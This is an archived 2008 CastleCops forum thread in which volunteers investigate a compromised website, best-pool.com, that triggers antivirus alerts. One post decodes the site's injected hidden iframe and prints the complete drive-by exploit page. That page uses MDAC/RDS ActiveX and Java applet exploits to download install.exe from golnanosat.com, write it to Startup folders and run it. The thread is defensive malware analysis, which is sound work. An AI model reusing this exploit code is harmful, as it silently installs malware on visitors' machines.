CastleCops® best-pool.com

Need help? Click here to register for free! Absolutely zero advertisements on this site!

	Donation/Premium

	Donations. Become Premium Today!

	Security Central

	· Home · PIRT/Fried Phish · MIRT · SIRT · Deutsch · Wiki · Newsletter · O16/ActiveX · CLSID List · Contest2007 · Downloads · Feedback (send) · Forums · HijackThis · Hijacktrend · LSPs · My Downloads · O18 · O20 · O21 · O22 · O23 · O9 · Premium · Private Messages · Proxomitron · Reviews · Search · StartupList · Stories Archive · Submit News · WsIRT · Your Account · Acceptable Use Policy

Forum FAQ

Usergroups

Profile

Select FavForums

best-pool.com

All -> FavForums -> Web Malware Links

[del.icio.us!] [digg it!] [reddit!]

View previous topic :: View next topic

Author

Message

cconniejean

Trooper
Trooper

Joined: Jan 16, 2008
Posts: 17
Location: USA

Posted: Fri Apr 11, 2008 2:28 am Post subject: best-pool.com

Code:

http://www.best-pool.com/

AVG trojan alerts and LinkScanner alerts.
LinkScanner Online has found
[MDAC ActiveX code execution (CVE-2006-0003)]

Not sure if this is a site that has been compromised or just a bad one.

philipp2

Trooper
Trooper

Joined: Apr 11, 2008
Posts: 22
Location: Germany

Posted: Fri Apr 11, 2008 3:44 pm Post subject:

hi,
there is a hidden iframe on this site. since it is a joomla installation i suppose the website has been 'hacked'. but who knows...
anyway, in the source we can find this piece of javascript in the footer:

Code:

which decodes to

Code:

<SCRIPT language="JavaScript">document.write('<iframe src="http://vipasotka.com/in.php?adv=5041&val=476b4c8a" style="display:none"></iframe>');
</SCRIPT>

the visitor is then redirected from http://vipasotka.com/in.php?adv=5041&val=476b4c8a to http://golnanosat.com/in.php?adv=5041&val=476b4c8a
here we find another piece of obfuscated javascript:

decoded:

Code:

<HTML><div id=testobj></div>
<SCRIPT Language="javascript" type="text/javascript">
function lsrn(lev3par1){
var exes="\\mmzp.exe"
var url="http://golnanosat.com/adw_files/5000/e18d59cb/install.exe?id=1";var stxml="XML";var stgt="GET";var std="D";var ldobj=null;
try{ldobj=objmker(lev3par1,"Microsoft."+stxml+"HTTP");ldobj.open(stgt,url,false);
}catch(e){try{ldobj=objmker(lev3par1,"MS"+stxml+"2."+stxml+"HTTP");ldobj.open(stgt,url,false);
}catch(e){try{ldobj=objmker(lev3par1,"MS"+stxml+"2.Server"+stxml+"HTTP");
ldobj.open(stgt,url,false);}catch(e){try{ldobj=new XMLHttpRequest();ldobj.open(stgt,url,false);}catch(e){return 0;}}}}
try{ldobj.send(null);}catch(e){try{ldobj.send(null);}catch(e){return 0;};};
ldbody = ldobj.responseBody;var obj_strm=objmker(lev3par1,"A"+std+"O"+std+"B.Stream");
if(obj_strm){obj_strm.Type=1;obj_strm.Mode=3;obj_strm.Open();obj_strm.Write(ldbody);
var hdrive="";var dtemp="";var dstart="";var daustart="";
try{var obj_WScript=objmker(lev3par1,"WScript.Shell");
try{var wshProcEnv=obj_WScript.Environment("PROCESS");hdrive=wshProcEnv("HOMEDRIVE");dtemp=wshProcEnv("TEMP");}catch(e){};
try{dstart=obj_WScript.SpecialFolders("Startup");daustart=obj_WScript.SpecialFolders("AllUsersStartup");}catch(e){};}catch(e){};
if(hdrive==""){hdrive="C:";};if(dtemp==""){try{var obj_fso=objmker(lev3par1,"Scripting.FileSystemObject");dtemp=obj_fso.GetSpecialFolder(2);}catch(e){};};var fnex="";var fn="";if(fnex==""){if(daustart!=""){try{fn=daustart+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};};
if(fnex==""){if(dstart!=""){try { fn=dstart+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};};
if(fnex==""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Menu Inicio\\Programas\\Inicio"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Menuen Start\\Programmer\\Start"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Menu Start\\Programma\\'s\\Opstarten"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Menu Start\\Programy\\Autostart"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Menu Avvio\\Programmi\\Esecuzione automatica"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Kaynnista-valikko\\Ohjelmat\\Kaynnistys"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Start Menu\\Programlar\\BASLANGIC"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Start-meny\\Programmer\\Oppstart"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Start-menyn\\Program\\Autostart"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Menu Iniciar\\Programas\\Iniciar"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn=hdrive+"\\Dokumente und Einstellungen\\All Users\\Startmenu\\Programme\\Autostart"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn=dtemp+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn="C:"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn="C:\\RECYCLER"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex==""){try{fn="C:\\RECYCLED"+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e){};};
if(fnex!=""){try{var obj_shl=objmker(lev3par1, "Shell.Application");obj_shl.ShellExecute(fnex);}catch(e){try{obj_WScript.Exec(fnex);}catch(e){
try{var obj2mk="testobj"+".innerHTML"+"=testobj"+".innerHTML"+"+\"<object"+" classid"+"='clsid:"+"527196a4-b1a3-4647-931d-37ba5af23037"+"' codebase="+"'\"+fnex+\"'></"+"object>\";";
eval(obj2mk);}catch(e){return 0;};};};return 1;}else{return 0;};};};
var i=0;var hncx=new Array("{BD96C"+"556-65A"+"3-11D0-9"+"83A-00C04"+"FC2"+"9E36}","{"+"AB9BC"+"EDD-E"+"C7E-47"+"E1-9322"+"-D4A2"+"1061"+"7116}","{0"+"006F033-0000-000"+"0-C0"+"00-0000000"+"000"+"46}", "{0006"+"F03A-0000-"+"0000-C000-"+"0000"+"000000"+"46}", "{6e32070"+"a-76"+"6d-4ee6-879c-d"+"c1fa91d2f"+"c3}", "{6414512B-B"+"978-451D-A0D8-F"+"CF"+"DF33E83"+"3C}", "{7F5B7"+"F63-F06F"+"-4331-8A26-339E03"+"C0AE"+"3D}", "{06723E09-F4C2-43"+"c8-8358-09FC"+"D1DB0766}", "{639"+"F725F-1B2D-48"+"31-"+"A9FD-8"+"7484768"+"2010}", "{B"+"A018599-1DB3-44f9-83B"+"4-461454C8"+"4BF8}", "{D0C07D5"+"6-7C69-"+"43F1-B4A0-2"+"5F5A11FAB1"+"9}", "{E8"+"CCCDDF-CA28-496b-"+"B050-6C07C"+"96247"+"6B}",null);
good=0; while(hncx[i]){var iuump=null;if(hncx[i].substring(0,1)=="{"){iuump=document.createElement("object");iuump.setAttribute("id","obj_RDS"+i);iuump.setAttribute("classid","clsid:"+hncx[i].substring(1,hncx[i].length-1));}if(iuump){try{if(lsrn(iuump)){break;};}catch(e){}}i++;}
function objmker(lev2par1, lev2par2){var nobj=null;try{eval('nobj=lev2par1.CreateObject(lev2par2)');}catch(e){}
if(!nobj){try{eval('nobj=lev2par1.CreateObject(lev2par2,"")');}catch(e){}}
if(!nobj){try{eval('nobj=lev2par1.CreateObject(lev2par2,"","")'); }catch(e){}}
if(!nobj){try{eval('nobj=lev2par1.GetObject("",lev2par2)');}catch(e){}}
if(!nobj){try{eval('nobj=lev2par1.GetObject(lev2par2,"")');}catch(e){}}
if(!nobj){try{eval('nobj=lev2par1.GetObject(lev2par2)');}catch(e){}}return(nobj);
}document.write("<applet code=animan.class name=maniman height=1 width=1 MAYSCRIPT></applet>");try {
var unsafeclass=document.maniman.getClass().forName("sun.misc.Unsafe");
var unsafemeth=unsafeclass.getMethod("getUnsafe",null);var unsafe=unsafemeth.invoke(unsafemeth,null);
document.maniman.foobar(unsafe);var chenref=unsafe.defineClass("omfg",document.maniman.luokka,0,document.maniman.classSize);
var chen=unsafe.allocateInstance(chenref);chen.setURLdl("http://golnanosat.com/adw_files/5000/e18d59cb/install.exe");chen.setUname("5000");chen.setCID("other");}catch(d){}
document.write("<applet archive=OP.jar code=OP.class width=1 height=1 MAYSCRIPT>");document.write("<param name=usid value=us0105>");
document.write("<param name=linkurl value=\"http://golnanosat.com/adw_files/5000/e18d59cb/install.exe?id=3\"></applet>");
document.write("<applet archive=\"ms03011.jar\" code=\"MagicApplet.class\" width=1 height=1>");
document.write("<param name=\"ModulePath\" value=\"http://golnanosat.com/adw_files/5000/e18d59cb/install.exe?id=4\"></applet>");
</SCRIPT></body></html>

i didnt analyse the behaviour of the malware (install.exe) itself, just decoded the javascript. but perhaps ill find some time later on Smile

regards
philipp

edit: removed one code section of obfuscated javascript, because its was destroying the page layout

cconniejean

Trooper
Trooper

Joined: Jan 16, 2008
Posts: 17
Location: USA

Posted: Fri Apr 11, 2008 8:49 pm Post subject:

Thank you, I recongize "vipasotka" and "golnanosat" from security blogs.

tetak

MIRT Team Lead
Premium Member

Joined: Jan 19, 2007
Posts: 5878

Posted: Sat Apr 12, 2008 3:51 pm Post subject:

Code:

http://golnanosat.com/adw_files/5000/e18d59cb/install.exe

Code:

http://golnanosat.com/ms03011.jar

Code:

http://golnanosat.com/OP.jar

Any new malware will be added to the malware listserv.

_________________
Got Windows XP? Help protect your PC from malware with Microsofts anti-spyware program Windows Defender.

Download it for free from http://www.microsoft.com/athome/security/spyware/software/default.mspx

	All -> FavForums -> Web Malware Links	All times are GMT
Page 1 of 1

You can post new topics in this forum
You can reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You cannot download files in this forum


	2002-2008 � Computer Cops LLC dba CastleCops®. All rights reserved. Acceptable Use Policy. Use signifies your agreement. 156ppm 0.246s (0.039s) Making cybercriminals unhappy since 2002*